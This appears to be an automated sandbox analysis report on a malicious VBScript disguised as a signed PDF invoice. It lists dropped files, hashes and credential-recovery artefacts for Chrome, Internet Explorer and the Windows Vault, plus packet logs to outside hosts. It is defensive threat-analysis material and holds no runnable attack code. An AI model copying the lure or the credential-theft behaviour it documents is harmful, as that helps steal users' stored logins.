                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dakv42rg.cxz.psm1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djjqv0ry.pay.psm1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2zg2vvi.aku.ps1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuysriqt.cbw.ps1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogim.jpeg

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):98686
                                                                                                                                                                                                                                                                Entropy (8bit):7.882370001248752
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:WO/iXVZd4WAFyMJWvoLC7W5wmIfXrhS9tWCZ9kj0doO7:WHVZrXxvCC/vsT6j0Z7
                                                                                                                                                                                                                                                                MD5:9E6078B7B88AC3677069340D0F4509DC
                                                                                                                                                                                                                                                                SHA1:356D6F3A803DB4FF7D5295BDE2AD1289E97FD504
                                                                                                                                                                                                                                                                SHA-256:1A9E81EBF9582309AE4D36FFB77473160FE2E2B15EFA196724BDFFA5D5BC5B77
                                                                                                                                                                                                                                                                SHA-512:5611E4067667410961970700703C39D7777797D521898801ED6FFB55CD5AF85DFFE25CACED699CD0FABFF8DD1CC7C7C6198084B9F3802BFB434B1E90A8E76629
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrg.ini

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):38
                                                                                                                                                                                                                                                                Entropy (8bit):2.7883088224543333
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                                                                                                                                                                                MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                                                                                                                                                                                SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                                                                                                                                                                                SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                                                                                                                                                                                SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):2.8420918598895937
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                                                                                                                                                                                MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                                                                                                                                                                                SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                                                                                                                                                                                SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                                                                                                                                                                                SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrv.ini

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):2.96096404744368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                                                                                                                                                                                                                                MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                                                                                                                                                                                                                                SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                                                                                                                                                                                                                                SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                                                                                                                                                                                                                                SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                File type:Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
                                                                                                                                                                                                                                                                Entropy (8bit):3.7148302585363684
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                                                                                                                                                                • MP3 audio (1001/1) 32.22%
                                                                                                                                                                                                                                                                • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                                                                                                                                                                • Corel Photo Paint (41/41) 1.32%
                                                                                                                                                                                                                                                                File name:Signed Proforma Invoice 3645479_pdf.vbs
                                                                                                                                                                                                                                                                File size:114'700 bytes
                                                                                                                                                                                                                                                                MD5:9e049f3029a5a6df1ab5d77d1a934ce3
                                                                                                                                                                                                                                                                SHA1:a31e0f94e0ee4dba78bc8adc291e1035d48561bd
                                                                                                                                                                                                                                                                SHA256:0831fee0915f056e6ca78e9a83a2fe75260a197c0d64e7a200ab8ebfc3479536
                                                                                                                                                                                                                                                                SHA512:de4fc68e686362318b5a77308a5b69fb43745b288f4043baf5929a12ea1d4b33fd9336472a13c010808c5feb75f519f2e5c3244374d9777f32d9f06d69abd4b7
                                                                                                                                                                                                                                                                SSDEEP:1536:Hxhb3QosU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:HjQNU1DHFUGmgURDFBe0tKl9CP4
                                                                                                                                                                                                                                                                TLSH:AEB3BB5267FA1208F5F7AB48A97611340B37BDA9AD7DC64C05CC290D0FF3A848865BB7
                                                                                                                                                                                                                                                                File Content Preview:......'.....c.o.n.s.t. .l.a.r.g.a.t.a. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .e.s.m.e.t.i.a.r. . . . . . .=. .3.....c.o.n.s.t. .p

                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:09.007878065 CEST49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.275552034 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.275608063 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.275841951 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.327629089 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.327647924 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.553569078 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.553812027 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.627948999 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.627979040 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.628371000 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.629435062 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.630696058 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.676120043 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093055964 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093101025 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093125105 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093130112 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093163013 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093189001 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093189001 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093194962 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093218088 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093224049 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093224049 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093230009 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093265057 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093265057 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093363047 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093558073 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093580008 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093590021 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093590021 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093596935 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093626976 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093653917 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093688965 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.093688965 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.104835033 CEST49730443192.168.2.4172.67.187.200
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:15.104859114 CEST44349730172.67.187.200192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900516987 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900577068 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.900671005 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.910021067 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.910047054 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.138297081 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.138386011 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.141815901 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.141827106 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.142187119 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.149214029 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.192121029 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422663927 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422713995 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422760010 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422786951 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422934055 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422971964 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.422979116 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423008919 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423038960 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423041105 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423048973 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423089027 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423094034 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423309088 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423336029 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423346043 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423351049 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423386097 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.423389912 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424093962 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424135923 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424137115 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424144983 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424179077 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424185038 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424216986 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424241066 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424249887 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424254894 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.424294949 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425045013 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425091028 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425116062 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425133944 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425143957 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425178051 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425183058 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425908089 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425934076 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425951004 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425960064 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.425991058 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426002026 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426007032 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426037073 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426042080 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426784992 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426811934 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426829100 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426834106 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426862955 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426867962 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426872969 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.426913977 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427640915 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427686930 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427712917 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427727938 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427736044 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427772999 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.427777052 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.428586006 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.428630114 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.428639889 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.476624966 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.526642084 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.526730061 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.527472973 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.527506113 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.527513981 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.527523994 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.527543068 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.528009892 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.528039932 CEST44349731104.21.45.138192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.528044939 CEST49731443192.168.2.4104.21.45.138
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:18.528049946 CEST44349731104.21.45.138192.168.2.4
